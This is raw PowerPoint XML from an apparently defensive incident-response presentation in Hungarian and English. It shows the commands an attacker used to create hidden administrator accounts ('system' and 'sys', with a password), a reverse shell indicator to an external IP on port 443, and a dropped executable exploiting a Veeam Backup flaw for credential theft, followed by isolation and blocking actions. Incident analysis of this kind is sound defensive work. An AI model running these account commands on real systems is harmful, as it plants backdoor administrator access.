                <a:t>C:\&gt; net user /add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>system</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 3@5yPa55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7CF7148-66C4-805E-D70F-BDF204FDD4AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4168375" y="4501652"/>
              <a:ext cx="6240727" cy="3670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400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>C:\&gt; net </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>localgroup</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> administrators </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>system</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /add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C73A7A8-1C94-EAC7-25A7-A2C1B71FA557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4819442" y="4612118"/>
            <a:ext cx="13402120" cy="1101665"/>
            <a:chOff x="4168374" y="3137277"/>
            <a:chExt cx="6240727" cy="741470"/>
          </a:xfrm>
          <a:noFill/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552F859-356C-CCAA-8659-E6258FBF28C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4168374" y="3137277"/>
              <a:ext cx="6240726" cy="3670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400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>C:\&gt; net user /add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sys</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 3@5yPa55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7E4F86B-E3F9-71A5-BF14-2FE2306973AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4168374" y="3511743"/>
              <a:ext cx="6240727" cy="3670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400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>C:\&gt; net </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>localgroup</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> administrators </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sys</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3400">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /add</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Graphic 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67E3C3F3-9F68-5112-BFD5-FCC30B9585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7545511" y="642538"/>
            <a:ext cx="888759" cy="888759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140113" y="769808"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>anagement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Agent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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1877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074EC7-4C57-19CA-17CC-6C4162E69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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEFACB9C-8112-9180-1F0A-8C15E6177E1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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{429ADF47-0C08-86D8-1494-3590E14A0CC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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FDA9FD-64C8-2CB6-B64C-6C660EA2EE9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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E2E2AFE-3162-5E5F-91C4-78B579FE66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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85A38D12-95B6-0E29-4428-26E11289790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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680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4AA36FE-753B-F6F6-C7FA-3E6531BE887C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183084" y="4539918"/>
            <a:ext cx="15662195" cy="3252802"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3195"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1"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0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="12700">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="32000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="75000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx2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ABF07F0-4681-7BD8-080F-488C18FB22B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183084" y="2246803"/>
            <a:ext cx="15662195" cy="2104722"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3195"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1"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0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="12700">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="32000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="75000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx2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735CD1-A92E-7ED6-A1F3-846DECF39541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1871041" y="10774995"/>
            <a:ext cx="11304302" cy="386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79320" lvl="1" indent="-226440" defTabSz="905758">
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:prstClr val="white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91[.]92.246.183:443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67E3C3F3-9F68-5112-BFD5-FCC30B9585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981695" y="793967"/>
            <a:ext cx="888759" cy="888759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9FC56D7-A28A-85E8-D6CA-1ECFEA48B15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450316" y="2561132"/>
            <a:ext cx="13686153" cy="1591311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" numCol="1" spcCol="540000" rtlCol="0">
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="152408" indent="-152408" algn="l" defTabSz="609630" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="12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1467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23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5758">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="991"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="5700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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Felhasználó:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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hu-HU" sz="5700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="57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System1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5700" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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elkezdett különböző feladatokat végrehajtani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5700" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5700" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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</a:br>
            <a:endParaRPr lang="hu-HU" sz="5700" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="905758">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="991"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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Reverse shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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57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91</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="57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[.]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="57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92.246.183:44</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="57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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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1" indent="0" defTabSz="905758">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404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60F3D11-BF5F-EE58-5275-28F1EC3E806D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011959" y="4683800"/>
            <a:ext cx="15800848" cy="2973009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" numCol="1" spcCol="540000" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="152408" indent="-152408" algn="l" defTabSz="609630" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="12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1467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23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0" defTabSz="905758">
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="452880" lvl="1" indent="0" defTabSz="905758">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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”Ledobott”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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EXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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fájl: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="36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sz="3600" dirty="0" err="1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ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="36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%\consoleapp1.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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Felismerve/Törölve az RTS által:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="36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MSIL/Exploit.CVE-2023-27532.A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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Sérülékenység a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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Veeam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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 Backup and Replication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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szoftverben </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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credential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white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lopás</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F07020304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7F7C6A0-55C6-FBF3-95E6-FF6F050A84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05518" y="7445189"/>
            <a:ext cx="5660130" cy="287251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4CDDCCA-3789-7887-3181-DD46964B1B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15216217" y="2420849"/>
            <a:ext cx="1365588" cy="1420507"/>
            <a:chOff x="8423017" y="8146238"/>
            <a:chExt cx="1429233" cy="1486712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96B99CB5-B133-2A90-39DA-03FC4CE5B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8423017" y="8375650"/>
              <a:ext cx="1257300" cy="1257300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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AC5776FC-B813-FE54-4923-8A4CEE28D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9220086" y="8146238"/>
              <a:ext cx="632164" cy="63216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930E8F8-E879-F256-6FCB-564795515C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="18513721" y="1723737"/>
            <a:ext cx="3689914" cy="4302895"/>
            <a:chOff x="5295013" y="1531088"/>
            <a:chExt cx="6528391" cy="7612912"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="281331" dist="707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CD275DC-3F66-EA28-ADCF-0B4F22A49E5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5295013" y="1531088"/>
              <a:ext cx="6528391" cy="6444512"/>
              <a:chOff x="5295013" y="1531088"/>
              <a:chExt cx="6528391" cy="6444512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9A32DE88-B63D-0217-B3B7-78374A9916FB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5295013" y="1531088"/>
                <a:ext cx="6528391" cy="6444512"/>
                <a:chOff x="5295013" y="1531088"/>
                <a:chExt cx="6528391" cy="6444512"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="Triangle 37">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{921DF1C9-4BBE-89A1-B858-7EFD170D3F86}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="8322990" y="7676707"/>
                  <a:ext cx="491067" cy="298893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39" name="Rounded Rectangle 38">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4766B38-22DC-FD1F-3BA3-200EBCE763F5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5295013" y="1531088"/>
                  <a:ext cx="6528391" cy="6145619"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 1096"/>
                  </a:avLst>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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10276A1-92D4-1A8B-8EBB-CE122144F90C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5660289" y="1679946"/>
                <a:ext cx="3314628" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Incident actions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F49B997-231B-8449-4EEB-737487F6246F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="2583703"/>
                <a:ext cx="3625238" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Isolate computers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F53AFC0-DF2B-E38E-ED51-689D5F5CBE03}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="3458445"/>
                <a:ext cx="4604948" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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End computer isolation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8FB7CC5-395A-4D84-DFFF-774DD6BA3047}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="4674038"/>
                <a:ext cx="2789719" cy="707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Kill processes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65A1ACF-A8B6-CB9E-B977-9B3E31880EB6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="5858532"/>
                <a:ext cx="3416388" cy="707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Block executable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0A2CB8F-909E-485B-14EF-E7E7A8D6CD83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="6751666"/>
                <a:ext cx="3938233" cy="707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Unblock executable</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="Graphic 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65637228-EBE9-8CB6-5818-5D2D79364C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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="2645078"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="Graphic 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
